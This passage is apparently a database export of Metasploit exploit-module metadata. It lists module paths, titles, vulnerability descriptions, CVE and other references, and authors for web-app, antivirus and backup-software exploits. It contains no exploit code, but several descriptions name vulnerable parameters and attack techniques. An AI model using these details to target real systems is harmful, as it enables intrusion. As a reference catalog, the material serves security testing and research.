(BSD)","f","2009-08-31 00:00:00",0,,"aggressive","t","EDB-9556, OSVDB-60018","egypt " 290,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/pajax_remote_exec.rb","exploit","unix/webapp/pajax_remote_exec","exploit/unix/webapp/pajax_remote_exec","PAJAX Remote Command Execution",600,"RedTeam has identified two security flaws in PAJAX (<= 0.5.1). It is possible to execute arbitrary PHP code from unchecked user input. 
Additionally, it is possible to include arbitrary files on the server ending in "".class.php"".","Metasploit Framework License (BSD)","f","2006-03-30 00:00:00",0,,"aggressive","t","BID-17519, CVE-2006-1551, OSVDB-24618, URL-http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php","Matteo Cantoni , hdm " 291,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_charts_exec.rb","exploit","unix/webapp/php_charts_exec","exploit/unix/webapp/php_charts_exec","PHP-Charts v1.0 PHP Code Execution Vulnerability",600,"This module exploits a PHP code execution vulnerability in php-Charts version 1.0 which could be abused to allow users to execute arbitrary PHP code under the context of the webserver user. The 'url.php' script calls eval() with user controlled data from any HTTP GET parameter name.","Metasploit Framework License (BSD)","f","2013-01-16 00:00:00",0,,"aggressive","t","BID-57448, EDB-24201, OSVDB-89334","AkaStep, Brendan Coles " 292,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_eval.rb","exploit","unix/webapp/php_eval","exploit/unix/webapp/php_eval","Generic PHP Code Evaluation",0,"Exploits things like It is likely that HTTP evasion options will break this exploit.","BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"egypt " 293,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_include.rb","exploit","unix/webapp/php_include","exploit/unix/webapp/php_include","PHP Remote File Include Generic Code Execution",300,"This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: ","Metasploit Framework License (BSD)","f","2006-12-17 00:00:00",0,,"aggressive","t",,"egypt , ethicalhack3r, hdm " 294,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_vbulletin_template.rb","exploit","unix/webapp/php_vbulletin_template","exploit/unix/webapp/php_vbulletin_template","vBulletin misc.php Template Name Arbitrary Code Execution",600,"This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the ""Add Template Name in HTML Comments"" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.","BSD License","f","2005-02-25 00:00:00",0,,"aggressive","t","BID-12622, CVE-2005-0511, OSVDB-14047","cazz , str0ke " 295,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_wordpress_foxypress.rb","exploit","unix/webapp/php_wordpress_foxypress","exploit/unix/webapp/php_wordpress_foxypress","WordPress plugin Foxypress uploadify.php Arbitrary Code Execution",600,"This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plug-in versions 0.4.2.1 and below are vulnerable.","Metasploit Framework License (BSD)","f","2012-06-05 00:00:00",0,,"aggressive","t","BID-53805, EDB-18991, OSVDB-82652","Sammy FORGIT, patrick " 296,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_wordpress_lastpost.rb","exploit","unix/webapp/php_wordpress_lastpost","exploit/unix/webapp/php_wordpress_lastpost","WordPress cache_lastpostdate Arbitrary Code Execution",600,"This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software. This vulnerability is only present when the PHP 'register_globals' option is enabled (common for hosting providers). 
All versions of WordPress prior to 1.5.1.3 are affected.","Metasploit Framework License (BSD)","f","2005-08-09 00:00:00",0,,"aggressive","t","BID-14533, CVE-2005-2612, OSVDB-18672","hdm , str0ke " 297,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_wordpress_total_cache.rb","exploit","unix/webapp/php_wordpress_total_cache","exploit/unix/webapp/php_wordpress_total_cache","Wordpress W3 Total Cache PHP Code Execution",600,"This module exploits a PHP Code Injection vulnerability against Wordpress plugin W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older is also reported as vulnerable. The vulnerability is due to the handling of certain macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is needed in order to add the malicious comment. If the POSTID option isn't specified, then the module will automatically bruteforce one. Also, if anonymous comments aren't allowed, then a valid username and password must be provided. In addition, the ""A comment is held for moderation"" option on Wordpress must be unchecked for successful exploitation. This module has been tested against Wordpress 3.5 and W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.","Metasploit Framework License (BSD)","f","2013-04-17 00:00:00",0,,"aggressive","t","BID-59316, OSVDB-92652, URL-http://wordpress.org/support/topic/pwn3d, URL-http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/","Christian Mehlmauer, Unknown, hdm , juan vazquez " 298,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_xmlrpc_eval.rb","exploit","unix/webapp/php_xmlrpc_eval","exploit/unix/webapp/php_xmlrpc_eval","PHP XML-RPC Arbitrary Code Execution",600,"This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. 
This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.","Metasploit Framework License (BSD)","f","2005-06-29 00:00:00",0,,"aggressive","t","BID-14088, CVE-2005-1921, OSVDB-17793","cazz , hdm " 299,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/phpbb_highlight.rb","exploit","unix/webapp/phpbb_highlight","exploit/unix/webapp/phpbb_highlight","phpBB viewtopic.php Arbitrary Code Execution",600,"This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace(). This vulnerability was introduced in revision 3076, and finally fixed in revision 5166. According to the ""tags"" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive).","Metasploit Framework License (BSD)","f","2004-11-12 00:00:00",0,,"aggressive","t","BID-10701, BID-14086, CVE-2004-1315, CVE-2005-2086, OSVDB-11719, OSVDB-17613","hdm , patrick , valsmith " 300,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/phpmyadmin_config.rb","exploit","unix/webapp/phpmyadmin_config","exploit/unix/webapp/phpmyadmin_config","PhpMyAdmin Config File Code Injection",600,"This module exploits a vulnerability in PhpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. 
The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"aggressive","t","CVE-2009-1151, EDB-8921, OSVDB-53076, URL-http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/, URL-http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php","Greg Ose, egypt , pagvac" 301,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/projectpier_upload_exec.rb","exploit","unix/webapp/projectpier_upload_exec","exploit/unix/webapp/projectpier_upload_exec","Project Pier Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability found in Project Pier. The application's uploading tool does not require any authentication, which allows a malicious user to upload an arbitrary file onto the web server, and then cause remote code execution by simply requesting it. 
This module is known to work against Apache servers because of the way Apache handles the uploaded file's extension name, but the vulnerability may not be exploitable on other web servers.","Metasploit Framework License (BSD)","f","2012-10-08 00:00:00",0,,"aggressive","t","EDB-21929, OSVDB-85881, URL-http://packetstormsecurity.org/files/117070/ProjectPier-0.8.8-Shell-Upload.html","BlackHawk, sinn3r " 302,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb","exploit","unix/webapp/qtss_parse_xml_exec","exploit/unix/webapp/qtss_parse_xml_exec","QuickTime Streaming Server parse_xml.cgi Remote Execution",600,"The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allowing arbitrary commands to be executed as root.","Metasploit Framework License (BSD)","t","2003-02-24 00:00:00",0,,"aggressive","t","BID-6954, CVE-2003-0050, OSVDB-10562","hdm " 303,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/redmine_scm_exec.rb","exploit","unix/webapp/redmine_scm_exec","exploit/unix/webapp/redmine_scm_exec","Redmine SCM Repository Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Redmine repository controller. The flaw is triggered when a rev parameter is passed to the command line of the SCM tool without adequate filtering.","Metasploit Framework License (BSD)","f","2010-12-19 00:00:00",0,,"aggressive","t","CVE-2011-4929, OSVDB-70090, URL-http://www.redmine.org/news/49","joernchen " 304,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/sphpblog_file_upload.rb","exploit","unix/webapp/sphpblog_file_upload","exploit/unix/webapp/sphpblog_file_upload","Simple PHP Blog <= 0.4.0 Remote Command Execution",600,"This module combines three separate issues within The Simple PHP Blog (<= 0.4.0) application to upload arbitrary data and thus execute a shell. 
The first vulnerability exposes the hash file (password.txt) to unauthenticated users. The second vulnerability lies within the image upload system provided to logged-in users; there is no image validation function in the blogger to prevent an authenticated user from uploading any file type. The third vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted.","Metasploit Framework License (BSD)","f","2005-08-25 00:00:00",0,,"aggressive","t","BID-14667, CVE-2005-2733, EDB-1191, OSVDB-19012","Matteo Cantoni , patrick " 305,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb","exploit","unix/webapp/squirrelmail_pgp_plugin","exploit/unix/webapp/squirrelmail_pgp_plugin","SquirrelMail PGP Plugin command execution (SMTP)",0,"This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at http://www.wslabi.com/. Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. 
Only ""cmd/unix/generic"" payloads were tested.","Metasploit Framework License (BSD)","f","2007-07-09 00:00:00",0,,"passive","t","CVE-2003-0990, OSVDB-3178, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330, URL-http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html, URL-http://www.wslabi.com/wabisabilabi/initPublishedBid.do?","Nicob " 306,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb","exploit","unix/webapp/sugarcrm_unserialize_exec","exploit/unix/webapp/sugarcrm_unserialize_exec","SugarCRM <= 6.3.1 unserialize() PHP Code Execution",600,"This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1 which could be abused to allow authenticated SugarCRM users to execute arbitrary code with the permissions of the webserver. The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php' script, which is called with user controlled data from the 'current_query_by_page' parameter. The exploit abuses the __destruct() method from the SugarTheme class to write arbitrary PHP code to a 'pathCache.php' on the web root.","Metasploit Framework License (BSD)","f","2012-06-23 00:00:00",0,,"aggressive","t","CVE-2012-0694, EDB-19381, URL-http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/","EgiX, juan vazquez , sinn3r " 307,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb","exploit","unix/webapp/tikiwiki_graph_formula_exec","exploit/unix/webapp/tikiwiki_graph_formula_exec","TikiWiki tiki-graph_formula Remote PHP Code Execution",600,"TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. 
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.","Metasploit Framework License (BSD)","f","2007-10-10 00:00:00",0,,"aggressive","t","BID-26006, CVE-2007-5423, OSVDB-40478","Matteo Cantoni , jduck " 308,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb","exploit","unix/webapp/tikiwiki_jhot_exec","exploit/unix/webapp/tikiwiki_jhot_exec","TikiWiki jhot Remote Command Execution",600,"TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a loss of integrity. The vulnerability was reported in Tikiwiki version 1.9.4.","Metasploit Framework License (BSD)","f","2006-09-02 00:00:00",0,,"aggressive","t","BID-19819, CVE-2006-4602, OSVDB-28456, URL-http://secunia.com/advisories/21733/","Matteo Cantoni " 309,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb","exploit","unix/webapp/tikiwiki_unserialize_exec","exploit/unix/webapp/tikiwiki_unserialize_exec","Tiki Wiki <= 8.3 unserialize() PHP Code Execution",600,"This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script, which is called with user controlled data from the 'printpages' parameter. The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy class to write arbitrary PHP code to a file on the Tiki Wiki web directory. 
In order to run successfully, three conditions must be satisfied: (1) the display_errors PHP setting must be On, to disclose the filesystem path of Tiki Wiki; (2) the Tiki Wiki Multiprint feature must be enabled, to reach the unserialize(); and (3) a PHP version older than 5.3.4 must be used, to allow poison null bytes in filesystem related functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.","Metasploit Framework License (BSD)","f","2012-07-04 00:00:00",0,,"aggressive","t","BID-54298, CVE-2012-0911, EDB-19573, OSVDB-83534, URL-http://dev.tiki.org/item4109","EgiX, juan vazquez " 310,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/trixbox_langchoice.rb","exploit","unix/webapp/trixbox_langchoice","exploit/unix/webapp/trixbox_langchoice","Trixbox langChoice PHP Local File Inclusion",0,"This module injects php into the trixbox session file and then, in a second call, evaluates that code by manipulating the langChoice parameter as described in OSVDB-50421.","Metasploit Framework License (BSD)","f","2008-07-09 00:00:00",0,,"aggressive","t","BID-30135, CVE-2008-6825, EDB-6026, OSVDB-50421, URL-http://www.trixbox.org/","chao-mu" 311,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/twiki_history.rb","exploit","unix/webapp/twiki_history","exploit/unix/webapp/twiki_history","TWiki History TWikiUsers rev Parameter Command Execution",600,"This module exploits a vulnerability in the history component of TWiki. 
By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.","Metasploit Framework License (BSD)","t","2005-09-14 00:00:00",0,,"aggressive","t","BID-14834, CVE-2005-2877, OSVDB-19403, URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev","B4dP4nd4, jduck " 312,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/twiki_maketext.rb","exploit","unix/webapp/twiki_maketext","exploit/unix/webapp/twiki_maketext","TWiki MAKETEXT Remote Command Execution",600,"This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl ""eval"" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.","Metasploit Framework License (BSD)","f","2012-12-15 00:00:00",0,,"aggressive","t","BID-56950, CVE-2012-6329, OSVDB-88460, URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329","George Clark, juan vazquez " 313,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/twiki_search.rb","exploit","unix/webapp/twiki_search","exploit/unix/webapp/twiki_search","TWiki Search Function Arbitrary Command Execution",600,"This module exploits a vulnerability in the search component of TWiki. 
By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands.","Metasploit Framework License (BSD)","t","2004-10-01 00:00:00",0,,"aggressive","t","BID-11674, CVE-2004-1037, OSVDB-11714, URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch","jduck " 314,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb","exploit","unix/webapp/webmin_show_cgi_exec","exploit/unix/webapp/webmin_show_cgi_exec","Webmin /file/show.cgi Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in Webmin 1.580. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges. The module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.","Metasploit Framework License (BSD)","t","2012-09-06 00:00:00",0,,"aggressive","t","BID-55446, CVE-2012-2982, OSVDB-85248, URL-http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf, URL-https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213","Unknown, juan vazquez " 315,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb","exploit","unix/webapp/wp_advanced_custom_fields_exec","exploit/unix/webapp/wp_advanced_custom_fields_exec","WordPress Plugin Advanced Custom Fields Remote File Inclusion",600,"This module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. 
This exploit only works when the PHP option allow_url_include is set to On (Default Off).","Metasploit Framework License (BSD)","f","2012-11-14 00:00:00",0,,"aggressive","t","OSVDB-87353, URL-http://secunia.com/advisories/51037/","Charlie Eriksen " 316,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb","exploit","unix/webapp/wp_asset_manager_upload_exec","exploit/unix/webapp/wp_asset_manager_upload_exec","WordPress Asset-Manager PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress plugin. By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-05-26 00:00:00",0,,"aggressive","t","BID-53809, EDB-18993, OSVDB-82653, URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html","James Fitts , Sammy FORGIT" 317,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb","exploit","unix/webapp/wp_google_document_embedder_exec","exploit/unix/webapp/wp_google_document_embedder_exec","WordPress Plugin Google Document Embedder Arbitrary File Disclosure",300,"This module exploits an arbitrary file disclosure flaw in the WordPress blogging software plugin known as Google Document Embedder. The vulnerability allows for database credential disclosure via the /libs/pdf.php script. The Google Document Embedder plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL server is exposed on an accessible IP and Wordpress has filesystem write access. 
Please note: The admin password may get changed if the exploit does not run to the end.","Metasploit Framework License (BSD)","f","2013-01-03 00:00:00",0,,"aggressive","t","CVE-2012-4915, OSVDB-88891, URL-http://secunia.com/advisories/50832","Charlie Eriksen" 318,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_property_upload_exec.rb","exploit","unix/webapp/wp_property_upload_exec","exploit/unix/webapp/wp_property_upload_exec","WordPress WP-Property PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-03-26 00:00:00",0,,"aggressive","t","BID-53787, EDB-18987, OSVDB-82656, URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html","James Fitts , Sammy FORGIT" 319,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/xoda_file_upload.rb","exploit","unix/webapp/xoda_file_upload","exploit/unix/webapp/xoda_file_upload","XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",600,"This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers can abuse the ""upload"" command in order to upload a malicious PHP file without any authentication, which results in arbitrary code execution. 
The module has been tested successfully on XODA 0.4.5 and Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2012-08-21 00:00:00",0,,"aggressive","t","BID-55127, EDB-20703, OSVDB-85117","Shai rod, juan vazquez " 320,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb","exploit","unix/webapp/zoneminder_packagecontrol_exec","exploit/unix/webapp/zoneminder_packagecontrol_exec","ZoneMinder Video Server packageControl Command Execution",600,"This module exploits a command execution vulnerability in ZoneMinder Video Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated users to execute arbitrary commands under the context of the web server user. The 'packageControl' function in the 'includes/actions.php' file calls 'exec()' with user controlled data from the 'runState' parameter.","Metasploit Framework License (BSD)","t","2013-01-22 00:00:00",0,,"aggressive","t","URL-http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/","Brendan Coles " 321,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/ams_hndlrsvc.rb","exploit","windows/antivirus/ams_hndlrsvc","exploit/windows/antivirus/ams_hndlrsvc","Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",600,"Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","t","2010-07-26 00:00:00",0,,"aggressive","t","BID-41959, OSVDB-66807, URL-http://www.foofus.net/~spider/code/AMS2_072610.txt","MC " 322,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/ams_xfr.rb","exploit","windows/antivirus/ams_xfr","exploit/windows/antivirus/ams_xfr","Symantec System Center Alert Management System (xfr.exe) Arbitrary Command 
Execution",600,"Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","t","2009-04-28 00:00:00",0,,"aggressive","t","BID-34671, CVE-2009-1429, OSVDB-54157, URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-060/","MC " 323,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/symantec_iao.rb","exploit","windows/antivirus/symantec_iao","exploit/windows/antivirus/symantec_iao","Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",400,"This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe. When an attacker sends a specially crafted alert, arbitrary code may be executed.","Metasploit Framework License (BSD)","t","2009-04-28 00:00:00",0,,"aggressive","t","BID-34674, CVE-2009-1430, OSVDB-54159","MC " 324,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/symantec_rtvscan.rb","exploit","windows/antivirus/symantec_rtvscan","exploit/windows/antivirus/symantec_rtvscan","Symantec Remote Management Buffer Overflow",400,"This module exploits a stack buffer overflow in Symantec Client Security 3.0.x. 
This module has only been tested against Symantec Client Security 3.0.2 build 10.0.2.2000.","Metasploit Framework License (BSD)","t","2006-05-24 00:00:00",0,,"aggressive","t","BID-18107, CVE-2006-2630, OSVDB-25846, URL-http://research.eeye.com/html/advisories/published/AD20060612.html","MC " 325,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb","exploit","windows/antivirus/trendmicro_serverprotect","exploit/windows/antivirus/trendmicro_serverprotect","Trend Micro ServerProtect 5.58 Buffer Overflow",400,"This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-02-20 00:00:00",0,,"aggressive","t","BID-22639, CVE-2007-1070, OSVDB-33042","MC " 326,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb","exploit","windows/antivirus/trendmicro_serverprotect_createbinding","exploit/windows/antivirus/trendmicro_serverprotect_createbinding","Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",400,"This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-05-07 00:00:00",0,,"aggressive","t","BID-23868, CVE-2007-2508, OSVDB-35790","MC " 327,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb","exploit","windows/antivirus/trendmicro_serverprotect_earthagent","exploit/windows/antivirus/trendmicro_serverprotect_earthagent","Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",400,"This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060 EarthAgent.EXE. 
By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-05-07 00:00:00",0,,"aggressive","t","BID-23866, CVE-2007-2508, OSVDB-35789","MC " 328,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/arkeia/type77.rb","exploit","windows/arkeia/type77","exploit/windows/arkeia/type77","Arkeia Backup Client Type 77 Overflow (Win32)",400,"This module exploits a stack buffer overflow in the Arkeia backup client for the Windows platform. This vulnerability affects all versions up to and including 5.3.3.","Metasploit Framework License (BSD)","t","2005-02-18 00:00:00",0,,"aggressive","t","BID-12594, CVE-2005-0491, OSVDB-14011, URL-http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html","hdm " 329,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/backdoor/energizer_duo_payload.rb","exploit","windows/backdoor/energizer_duo_payload","exploit/windows/backdoor/energizer_duo_payload","Energizer DUO Trojan Code Execution",600,"This module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger.","Metasploit Framework License (BSD)","f","2010-03-05 00:00:00",0,,"aggressive","t","CVE-2010-0103, OSVDB-62782, US-CERT-VU-154421","hdm " 330,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/backupexec/name_service.rb","exploit","windows/backupexec/name_service","exploit/windows/backupexec/name_service","Veritas Backup Exec Name Service Overflow",200,"This module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. 
Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6.","Metasploit Framework License (BSD)","t","2004-12-16 00:00:00",0,,"aggressive","t","BID-11974, CVE-2004-1172, OSVDB-12418, URL-http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities","hdm " 331,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/backupexec/remote_agent.rb","exploit","windows/backupexec/remote_agent","exploit/windows/backupexec/remote_agent","Veritas Backup Exec Windows Remote Agent Overflow",500,"This module exploits a stack buffer overflow in the Veritas BackupExec Windows Agent software. This vulnerability occurs when a client authentication request is received with type '3' and a long password argument. Reliable execution is obtained by abusing the stack buffer overflow to smash a SEH pointer.","Metasploit Framework License (BSD)","t","2005-06-22 00:00:00",0,,"aggressive","t","BID-14022, CVE-2005-0773, OSVDB-17624, URL-http://seer.support.veritas.com/docs/276604.htm, URL-http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities","hdm " 332,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/ca_arcserve_342.rb","exploit","windows/brightstor/ca_arcserve_342","exploit/windows/brightstor/ca_arcserve_342","Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. 
